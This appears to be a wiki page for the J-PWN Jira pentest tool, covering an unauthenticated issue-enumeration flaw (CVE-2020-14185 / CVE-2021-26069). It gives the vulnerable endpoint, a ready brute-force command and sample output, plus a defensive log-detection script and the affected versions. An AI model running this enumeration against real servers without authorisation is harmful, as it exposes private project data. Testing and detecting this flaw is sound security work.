CVE‐2020‐14185 | CVE‐2021‐26069 - carnal0wnage/J-PWN GitHub Wiki

CVE-2020-14185 | CVE-2021-26069

Category: [Info Disclosure | Enumeration]

Affected versions of Jira Server allow remote unauthenticated attackers to enumerate issue keys via a missing permissions check in the ActionsAndOperations resource.

module name: check_cve_2020_14185

url: {url}/rest/api/1.0/issues/{issue_id}/ActionsAndOperations

[CG] As far as I can tell, these two CVEs are the same issue (CVE-2020-14185 | CVE-2021-26069).

Checking: http://JIRASERVER:8080/
+ JIRA is running on: http://JIRASERVER:8080 

JIRA Server Information:
  Base URL        : http://OTHERJIRA:8080
  Version         : 7.12.3
  Deployment Type : Server
  Build Number    : 712004
  Build Date      : 2018-10-12T00:00:00.000+0800
  Server Title    : REMOVED

[CG] You need to run this check in single-module mode because of the number of requests it sends.

Defaults for the module:

  --start_id START_ID   Start ID for issue enumeration (default: 10000)
  --end_id END_ID       End ID for issue enumeration (default: 20000)

To run the module:

python3 j-pwn.py --single http://JIRASERVER:8080 --module check_cve_2020_14185 --end_id 10200

INFO: Brute-forcing Enumeration via ActionsAndOperations Resource with threading
- Issue ID 10000 not found (HTTP 404)
- Issue ID 10060 not found (HTTP 404)
- Issue ID 10080 not found (HTTP 404)
- Issue ID 10180 not found (HTTP 404)
- Issue ID 10020 not found (HTTP 404)
- Issue ID 10100 not found (HTTP 404)
- Issue ID 10040 not found (HTTP 404)
[+] [CVE-2020-14185 | CVE-2021-26069] Vulnerable to issue enumeration via ActionsAndOperations: http://JIRASERVER:8080/rest/api/1.0/issues/10140/ActionsAndOperations

  Enumerated Operations:
    - Issue ID: 10140
    - Issue Key: AN-82
    - View Issue: 查看问题
[+] [CVE-2020-14185 | CVE-2021-26069] Vulnerable to issue enumeration via ActionsAndOperations: http://JIRASERVER:8080/rest/api/1.0/issues/10160/ActionsAndOperations

  Enumerated Operations:
    - Issue ID: 10160
    - Issue Key: AN-102
    - View Issue: 查看问题
<SNIP>
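
On the defender's side, a run like the one above leaves a recognisable pattern in the web access log: one client requesting many numeric issue IDs under /rest/api/1.0/issues/{id}/ActionsAndOperations, most of them answered with 404. The following is an added example, not part of J-PWN, that flags that pattern. The Combined Log Format, the thresholds, the client addresses, the HTTP 200 status for the hits and the sample lines are all assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Resource path from the page; the numeric segment is the issue ID being probed.
ENDPOINT = re.compile(r"/rest/api/1\.0/issues/(\d+)/ActionsAndOperations(?:\?|$)")
# Assumption: Common/Combined Log Format access log (reverse proxy or Tomcat valve).
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3}) ')

def find_enumeration(lines, min_ids=5, min_404_ratio=0.5):
    """Flag clients probing many issue IDs with mostly 404s (illustrative thresholds)."""
    clients = defaultdict(lambda: {"ids": set(), "ok": set(), "nf": 0, "total": 0})
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # unparseable line: skip instead of guessing fields
        ip, path, status = m.group(1), m.group(2), int(m.group(3))
        hit = ENDPOINT.search(path)
        if not hit:
            continue  # request for some other resource
        c, issue_id = clients[ip], int(hit.group(1))
        c["ids"].add(issue_id)
        c["total"] += 1
        if status == 404:
            c["nf"] += 1
        elif status == 200:
            c["ok"].add(issue_id)  # IDs whose details were returned to the client
    flagged = {}
    for ip, c in clients.items():
        ratio = c["nf"] / c["total"]
        if len(c["ids"]) >= min_ids and ratio >= min_404_ratio:
            flagged[ip] = {"distinct_ids": len(c["ids"]), "ratio_404": round(ratio, 2),
                           "answered_200": sorted(c["ok"])}
    return flagged

def _line(ip, issue_id, status):  # builds one constructed log line
    return (f'{ip} - - [01/Jan/2024:10:00:00 +0000] "GET /rest/api/1.0/issues/'
            f'{issue_id}/ActionsAndOperations HTTP/1.1" {status} 512 "-" "-"')

# Constructed sample: one client repeating the IDs from the run above, one normal user.
SAMPLE_LOG = (
    [_line("203.0.113.7", i, 404) for i in (10000, 10060, 10080, 10180, 10020, 10100, 10040)]
    + [_line("203.0.113.7", i, 200) for i in (10140, 10160)]
    + [_line("198.51.100.20", 10140, 200)] * 2
)

if __name__ == "__main__":
    for ip, summary in find_enumeration(SAMPLE_LOG).items():
        print(ip, summary)
```

The `answered_200` list is the set of issue IDs to review for disclosure if the server was running an affected version at the time.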

References

https://jira.atlassian.com/browse/JRASERVER-71696 [CVE-2020-14185]

Description: Affected versions of Jira Server allow remote unauthenticated attackers to enumerate issue keys via a missing permissions check in the ActionsAndOperations resource.

The affected versions are before 7.13.18, from version 8.0.0 before 8.5.9, and from version 8.6.0 before version 8.12.2.

Affected versions:

  • version < 7.13.18
  • 8.0.0 ≤ version < 8.5.9
  • 8.6.0 ≤ version < 8.12.2

Fixed versions:

  • 7.13.18
  • 8.5.9
  • 8.12.2

https://jira.atlassian.com/browse/JRASERVER-72010 [CVE-2021-26069]

Description: Affected versions of Atlassian Jira Server and Data Center allow unauthenticated remote attackers to download temporary files and enumerate project keys via an Information Disclosure vulnerability in the /rest/api/1.0/issues/{id}/ActionsAndOperations API endpoint.

The affected versions are before version 8.5.11, from version 8.6.0 before 8.13.3, and from version 8.14.0 before 8.15.0.

Affected versions:

  • version < 8.5.11
  • 8.6.0 ≤ version < 8.13.3
  • 8.14.0 ≤ version < 8.15.0

Fixed versions:

  • 8.5.11
  • 8.13.3
  • 8.15.0